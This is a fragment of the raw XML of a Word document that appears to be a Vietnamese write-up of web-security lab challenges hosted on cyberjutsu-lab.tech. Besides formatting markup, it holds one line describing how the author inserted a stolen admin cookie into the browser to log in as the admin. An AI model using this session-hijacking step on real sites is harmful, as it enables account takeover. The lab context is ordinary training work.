                      <a:ext cx="5731510" cy="1795780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72928955" w14:textId="77777777" w:rsidR="005B72CD" w:rsidRDefault="005B72CD">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="256F0977" w14:textId="7C9ED608" w:rsidR="005B72CD" w:rsidRDefault="005B72CD" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Thực hiện điền cookie của admin vào browser và thành công đăng nhập vào tài khoản admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0912038A" w14:textId="7E984E8D" w:rsidR="0022766E" w:rsidRPr="00AE1A9C" w:rsidRDefault="0022766E" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0022766E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="340A6285" wp14:editId="742E20A1">
            <wp:extent cx="5731510" cy="2035810"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="207767743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77436" name="Picture 1" descr="A black text on a white background&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2035810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0022766E" w:rsidRPr="00AE1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538"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4BB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A2D81"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C478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22171"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3BB292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67C6C3E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="953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726B4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F25E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45B8C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AA9CC7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AED08F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="714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C0091"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D7349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232689">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1353261214">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1528254069">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1060324751">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="158543926">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="96484202">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1408963630">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1673416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F5"/>
    <w:rsid w:val="00001814"/>
    <w:rsid w:val="000158F4"/>
    <w:rsid w:val="0002152D"/>
    <w:rsid w:val="00021C49"/>
    <w:rsid w:val="00024AAF"/>
    <w:rsid w:val="000351C4"/>
    <w:rsid w:val="00053920"/>
    <w:rsid w:val="00065E0D"/>
    <w:rsid w:val="00067F31"/>
    <w:rsid w:val="000A7F0B"/>
    <w:rsid w:val="000B27B9"/>
    <w:rsid w:val="000C6666"/>
    <w:rsid w:val="000C698F"/>
    <w:rsid w:val="001143CB"/>
    <w:rsid w:val="001176ED"/>
    <w:rsid w:val="001447EE"/>
    <w:rsid w:val="00183192"/>
    <w:rsid w:val="001A0AEA"/>
    <w:rsid w:val="00222FE7"/>
    <w:rsid w:val="00224C41"/>
    <w:rsid w:val="0022766E"/>
    <w:rsid w:val="002412E1"/>
    <w:rsid w:val="00242B15"/>
    <w:rsid w:val="00243573"/>
    <w:rsid w:val="00255401"/>
    <w:rsid w:val="0026746C"/>
    <w:rsid w:val="002949EF"/>
    <w:rsid w:val="002A10AE"/>
    <w:rsid w:val="002B18E2"/>
    <w:rsid w:val="002B4180"/>
    <w:rsid w:val="002D2CE9"/>
    <w:rsid w:val="002E2A7F"/>
    <w:rsid w:val="002F2607"/>
    <w:rsid w:val="00300D4F"/>
    <w:rsid w:val="003364F4"/>
    <w:rsid w:val="00337950"/>
    <w:rsid w:val="00350274"/>
    <w:rsid w:val="003776E1"/>
    <w:rsid w:val="00377B0F"/>
    <w:rsid w:val="00382E61"/>
    <w:rsid w:val="00397974"/>
    <w:rsid w:val="003C75D5"/>
    <w:rsid w:val="003D1A87"/>
    <w:rsid w:val="003D4932"/>
    <w:rsid w:val="003E5330"/>
    <w:rsid w:val="0041360A"/>
    <w:rsid w:val="00421EE6"/>
    <w:rsid w:val="0045189E"/>
    <w:rsid w:val="004573E1"/>
    <w:rsid w:val="00492FC5"/>
    <w:rsid w:val="004D36ED"/>
    <w:rsid w:val="004E18C7"/>
    <w:rsid w:val="004E3AA5"/>
    <w:rsid w:val="004F4908"/>
    <w:rsid w:val="004F6DD5"/>
    <w:rsid w:val="00510D90"/>
    <w:rsid w:val="00511622"/>
    <w:rsid w:val="00522D24"/>
    <w:rsid w:val="005261B2"/>
    <w:rsid w:val="00530DA0"/>
    <w:rsid w:val="00555A7B"/>
    <w:rsid w:val="00571AD4"/>
    <w:rsid w:val="00591DBA"/>
    <w:rsid w:val="005B72CD"/>
    <w:rsid w:val="005D5F8C"/>
    <w:rsid w:val="005E5C03"/>
    <w:rsid w:val="006420C6"/>
    <w:rsid w:val="00666AE4"/>
    <w:rsid w:val="006765C9"/>
    <w:rsid w:val="006B0EB0"/>
    <w:rsid w:val="006E21A5"/>
    <w:rsid w:val="006F7E90"/>
    <w:rsid w:val="0070276C"/>
    <w:rsid w:val="007511B8"/>
    <w:rsid w:val="00765D3F"/>
    <w:rsid w:val="00793BF0"/>
    <w:rsid w:val="007D21B6"/>
    <w:rsid w:val="007D5435"/>
    <w:rsid w:val="007E5B2F"/>
    <w:rsid w:val="007E69E0"/>
    <w:rsid w:val="007F6FD3"/>
    <w:rsid w:val="008365F7"/>
    <w:rsid w:val="00841552"/>
    <w:rsid w:val="0086416C"/>
    <w:rsid w:val="00873FD8"/>
    <w:rsid w:val="0089215E"/>
    <w:rsid w:val="0089724A"/>
    <w:rsid w:val="008A24CD"/>
    <w:rsid w:val="008A6469"/>
    <w:rsid w:val="008D197F"/>
    <w:rsid w:val="008E43EE"/>
    <w:rsid w:val="008E614D"/>
    <w:rsid w:val="00902DC1"/>
    <w:rsid w:val="00925BAE"/>
    <w:rsid w:val="009366E2"/>
    <w:rsid w:val="00947E44"/>
    <w:rsid w:val="00957F21"/>
    <w:rsid w:val="009776BE"/>
    <w:rsid w:val="00982965"/>
    <w:rsid w:val="00993404"/>
    <w:rsid w:val="009B4BCE"/>
    <w:rsid w:val="009F681C"/>
    <w:rsid w:val="00A00E0B"/>
    <w:rsid w:val="00A21A68"/>
    <w:rsid w:val="00A34317"/>
    <w:rsid w:val="00A348D2"/>
    <w:rsid w:val="00A3783F"/>
    <w:rsid w:val="00A524C1"/>
    <w:rsid w:val="00A8146F"/>
    <w:rsid w:val="00A82B37"/>
    <w:rsid w:val="00A865B6"/>
    <w:rsid w:val="00A92BAD"/>
    <w:rsid w:val="00AC1705"/>
    <w:rsid w:val="00AC2F35"/>
    <w:rsid w:val="00AC3462"/>
    <w:rsid w:val="00AE1A9C"/>
    <w:rsid w:val="00AE2907"/>
    <w:rsid w:val="00B007DF"/>
    <w:rsid w:val="00B05004"/>
    <w:rsid w:val="00B10EA9"/>
    <w:rsid w:val="00B262DD"/>
    <w:rsid w:val="00B90554"/>
    <w:rsid w:val="00B929D6"/>
    <w:rsid w:val="00BB6E11"/>
    <w:rsid w:val="00BF65F3"/>
    <w:rsid w:val="00C10D08"/>
    <w:rsid w:val="00C14158"/>
    <w:rsid w:val="00C15BE2"/>
    <w:rsid w:val="00C30C00"/>
    <w:rsid w:val="00C312F1"/>
    <w:rsid w:val="00C42DF5"/>
    <w:rsid w:val="00C4468B"/>
    <w:rsid w:val="00C611FA"/>
    <w:rsid w:val="00C61828"/>
    <w:rsid w:val="00C625E0"/>
    <w:rsid w:val="00C640B4"/>
    <w:rsid w:val="00C66DF7"/>
    <w:rsid w:val="00C743F7"/>
    <w:rsid w:val="00C8393C"/>
    <w:rsid w:val="00CA0842"/>
    <w:rsid w:val="00CA67D1"/>
    <w:rsid w:val="00CE3787"/>
    <w:rsid w:val="00D23CDA"/>
    <w:rsid w:val="00D318D0"/>
    <w:rsid w:val="00D34F03"/>
    <w:rsid w:val="00D43EE8"/>
    <w:rsid w:val="00D749C8"/>
    <w:rsid w:val="00D851FC"/>
    <w:rsid w:val="00D8795A"/>
    <w:rsid w:val="00DA21B6"/>
    <w:rsid w:val="00DA6976"/>
    <w:rsid w:val="00DC7D26"/>
    <w:rsid w:val="00DF056C"/>
    <w:rsid w:val="00E12C5B"/>
    <w:rsid w:val="00E14E4D"/>
    <w:rsid w:val="00E17AB3"/>
    <w:rsid w:val="00E25A7F"/>
    <w:rsid w:val="00E26660"/>
    <w:rsid w:val="00E31AE1"/>
    <w:rsid w:val="00E508E7"/>
    <w:rsid w:val="00E54709"/>
    <w:rsid w:val="00E61604"/>
    <w:rsid w:val="00E7566B"/>
    <w:rsid w:val="00E83E06"/>
    <w:rsid w:val="00E861A1"/>
    <w:rsid w:val="00E9212C"/>
    <w:rsid w:val="00EA2330"/>
    <w:rsid w:val="00EC5099"/>
    <w:rsid w:val="00ED6FF5"/>
    <w:rsid w:val="00F068B3"/>
    <w:rsid w:val="00F14D43"/>
    <w:rsid w:val="00F26F56"/>
    <w:rsid w:val="00F6041E"/>
    <w:rsid w:val="00F62FEC"/>
    <w:rsid w:val="00F75865"/>
    <w:rsid w:val="00FD41D1"/>
    <w:rsid w:val="00FD5823"/>
    <w:rsid w:val="00FF62B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D4F2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9DD75969-451D-4DD3-99EE-52985DEBD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A7F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00C42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DF5"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00C4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DF5"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00C42DF5"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C42DF5"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00C42DF5"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00C42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DF5"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00C42DF5"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C42DF5"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C42DF5"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00336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3364F4"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DF056C"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A82B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hyperlink" Target="https://note2.cyberjutsu-lab.tech/"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note6.cyberjutsu-lab.tech/"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hyperlink" Target="https://victim.cyberjutsu-lab.tech/"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note4.cyberjutsu-lab.tech/"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hyperlink" Target="https://note3.cyberjutsu-lab.tech/" TargetMode="Externa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hyperlink" Target="https://wpt.cyberjutsu.io/challenge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hyperlink" Target="https://note1.cyberjutsu-lab.tech/"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hyperlink" Target="https://note5.cyberjutsu-lab.tech/"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3329</TotalTime>
  <Pages>21</Pages>
  <Words>2466</Words>
  <Characters>14058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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-26T11:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-29T16:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>